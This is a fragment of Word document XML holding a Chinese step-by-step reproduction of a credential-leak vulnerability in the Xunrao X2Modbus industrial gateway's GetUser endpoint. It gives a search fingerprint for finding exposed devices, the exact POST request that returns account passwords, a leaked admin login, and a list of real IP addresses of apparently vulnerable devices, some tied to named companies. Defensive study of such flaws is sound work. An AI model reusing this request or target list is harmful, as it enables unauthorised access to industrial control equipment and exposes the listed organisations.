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3、迅饶科技 X2Modbus 网关 GetUser 敏感信息泄露</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="ue222a17d" w:id="0"/>
      <w:bookmarkStart w:name="u1aede777" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="397234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64400" cy="49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bookmarkEnd w:id="0"/>
    <w:bookmarkStart w:name="Hl4Fq" w:id="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漏洞简介</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:bookmarkStart w:name="ue89e861b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X2Modbus网关GetUser接口存在一个信息泄漏漏洞，使得未经授权的用户或攻击者可以获取敏感信息。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="3"/>
    <w:bookmarkStart w:name="VkKfc" w:id="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漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="4"/>
    <w:bookmarkStart w:name="u17ded53c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步骤一：使用以下搜索语法获取测试资产并确定测试目标</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="5"/>
    <w:bookmarkStart w:name="lfZlM" w:id="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server="SunFull-Webs"</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="6"/>
    <w:bookmarkStart w:name="u37a4f8f1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步骤二：构造以下数据包并发送，发送后可在相应正文中获取登录的账号与密码信息</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="7"/>
    <w:bookmarkStart w:name="wp6Yw" w:id="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POST /soap/GetUser HTTP/1.1</w:t>
        <w:br/>
        <w:t>Host: 127.0.0.1</w:t>
        <w:br/>
        <w:t>Cache-Control: max-age=0</w:t>
        <w:br/>
        <w:t>Upgrade-Insecure-Requests: 1</w:t>
        <w:br/>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36</w:t>
        <w:br/>
        <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</w:t>
        <w:br/>
        <w:t>Referer: http://60.12.13.234:880/login.html</w:t>
        <w:br/>
        <w:t>Accept-Encoding: gzip, deflate</w:t>
        <w:br/>
        <w:t>Accept-Language: zh-CN,zh;q=0.9</w:t>
        <w:br/>
        <w:t>Cookie: language=zh-cn; username=admin1</w:t>
        <w:br/>
        <w:t>If-Modified-Since: Sat Jun 29 10:02:08 2019</w:t>
        <w:br/>
        <w:t>Connection: close</w:t>
        <w:br/>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
        <w:br/>
        <w:t>Content-Length: 56</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>&lt;GetUser&gt;&lt;User Name="admin" Password="admin"/&gt;&lt;/GetUser&gt;</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="8"/>
    <w:bookmarkStart w:name="u7ba3579d" w:id="9"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="u4e133602" w:id="10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5588000" cy="297411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97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  <w:bookmarkStart w:name="ub250f747" w:id="11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4690533" cy="216146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0533" cy="216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bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:name="ud774a7f0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步骤三：使用以上获取的账号密码进行登陆测试</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkStart w:name="ROpoN" w:id="1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username:admin</w:t>
        <w:br/>
        <w:t>password:admin1234546</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkStart w:name="u35d0a090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其他案例</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:bookmarkStart w:name="X4nwH" w:id="1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116.233.215.228:6688 上海贝锐信息科技股份有限公司广州分公司</w:t>
        <w:br/>
        <w:t>61.132.80.90:8000</w:t>
        <w:br/>
        <w:t>113.108.135.154:3001</w:t>
        <w:br/>
        <w:t>60.12.13.234:912</w:t>
        <w:br/>
        <w:t>112.94.15.18:8093  皇家空调设备工程（广东）有限公司</w:t>
        <w:br/>
        <w:t>112.94.15.18:8095</w:t>
        <w:br/>
        <w:t>94.74.130.130:8090</w:t>
        <w:br/>
        <w:t>60.12.13.234:900</w:t>
        <w:br/>
        <w:t>121.33.200.178:3001</w:t>
        <w:br/>
        <w:t>60.12.13.234:902</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="15"/>
    <w:bookmarkStart w:name="u44113199" w:id="16"/>
    <w:bookmarkEnd w:id="16"/>
    <w:bookmarkStart w:name="u8501856e" w:id="17"/>
    <w:bookmarkEnd w:id="17"/>
    <w:bookmarkStart w:name="u697f3a17" w:id="18"/>
    <w:bookmarkEnd w:id="18"/>
    <w:bookmarkStart w:name="u70887794" w:id="19"/>
    <w:bookmarkEnd w:id="19"/>
    <w:bookmarkStart w:name="u12c70697" w:id="20"/>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:name="ue3816552" w:id="21"/>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:name="uf1a2d872" w:id="22"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>节快乐～</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22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